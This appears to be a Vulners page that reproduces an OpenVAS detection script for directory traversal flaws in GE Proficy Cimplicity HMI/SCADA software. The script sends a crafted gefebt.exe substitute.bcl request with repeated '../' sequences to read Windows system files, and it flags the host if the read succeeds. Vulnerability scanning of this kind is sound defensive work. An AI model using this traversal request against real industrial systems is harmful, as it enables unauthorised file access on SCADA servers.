Lucene search
+L

GE Intelligent Platforms Proficy Cimplicity Multiple Vulnerabilities

🗓️ 11 Sep 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 21 Views

GE Intelligent Platforms Proficy Cimplicity Multiple Vulnerabilities, potentially allowing remote attackers to crash or take control of the serve

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-0653
29 May 201815:50
circl
checkpoint_advisories
Check Point Advisories
GE Intelligent Platforms Proficy SCADA Substitute.bcl Directory Traversal (CVE-2013-0653)
4 Nov 201300:00
checkpoint_advisories
cve
CVE
CVE-2013-0653
27 Jan 201318:00
cve
cve
CVE
CVE-2013-0654
27 Jan 201318:00
cve
cvelist
Cvelist
CVE-2013-0653
27 Jan 201318:00
cvelist
cvelist
Cvelist
CVE-2013-0654
27 Jan 201318:00
cvelist
euvd
EUVD
EUVD-2013-0664
27 Jan 201318:00
euvd
euvd
EUVD
EUVD-2013-0665
7 Oct 202500:30
euvd
ics
ICS
GE Intelligent Platforms Proficy Cimplicity Multiple Vulnerabilities
26 Oct 201306:00
ics
metasploit
Metasploit
GE Proficy Cimplicity WebView substitute.bcl Directory Traversal
22 Jan 201300:00
metasploit
Rows per page
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103785");
  script_cve_id("CVE-2013-0653", "CVE-2013-0654");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_version("2025-12-11T05:46:19+0000");
  script_name("GE Intelligent Platforms Proficy Cimplicity Multiple Vulnerabilities");
  script_xref(name:"URL", value:"http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02");
  script_xref(name:"URL", value:"http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB15153");
  script_xref(name:"URL", value:"http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB15244");
  script_tag(name:"last_modification", value:"2025-12-11 05:46:19 +0000 (Thu, 11 Dec 2025)");
  script_tag(name:"creation_date", value:"2013-09-11 14:38:23 +0200 (Wed, 11 Sep 2013)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_dependencies("gb_get_http_banner.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("CIMPLICITY/banner");

  script_tag(name:"impact", value:"If the vulnerabilities are exploited, they could allow an unauthenticated remote
  attacker to cause the CIMPLICITY built-in Web server to crash or to run arbitrary commands on
  a server running the affected software, or could potentially allow an attacker to take control
  of the CIMPLICITY server.");

  script_tag(name:"vuldetect", value:"Send a maliciously crafted HTTP request to read a local file.");

  script_tag(name:"insight", value:"General Electric (GE) has addressed two vulnerabilities in GE Intelligent
  Platforms Proficy HMI/SCADA-CIMPLICITY: a directory transversal vulnerability and improper
  input validation vulnerability.

  GE has released two security advisories (GEIP12-13 and GEIP12-19) available on the GE
  Intelligent Platforms support Web site to inform customers about these
  vulnerabilities.");

  script_tag(name:"solution", value:"Updates are available.");
  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"summary", value:"GE Intelligent Platforms Proficy Cimplicity is prone to multiple vulnerabilities.");

  script_tag(name:"affected", value:"GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and
  Proficy Process Systems with CIMPLICITY.");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");

port = http_get_port( default:80 );

banner = http_get_remote_headers( port:port );
if( "Server: CIMPLICITY" >!< banner ) exit( 0 );

files = traversal_files('windows');

foreach dir( make_list_unique( "/CimWeb", http_cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";
  url = dir + '/index.html';
  buf = http_get_cache( item:url, port:port );

  if( "gefebt.exe" >< buf ) {
    foreach file( keys( files ) ) {
      url = dir + '/gefebt.exe?substitute.bcl+FILE=' + crap(data:"../",length:6*9) + files[file];
      if( http_vuln_check( port:port, url:url, pattern:file, check_header:TRUE ) ) {
        report = http_report_vuln_url( port:port, url:url );
        security_message( port:port, data:report );
        exit( 0 );
      }
    }
  }
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 29.3
EPSS0.19111
21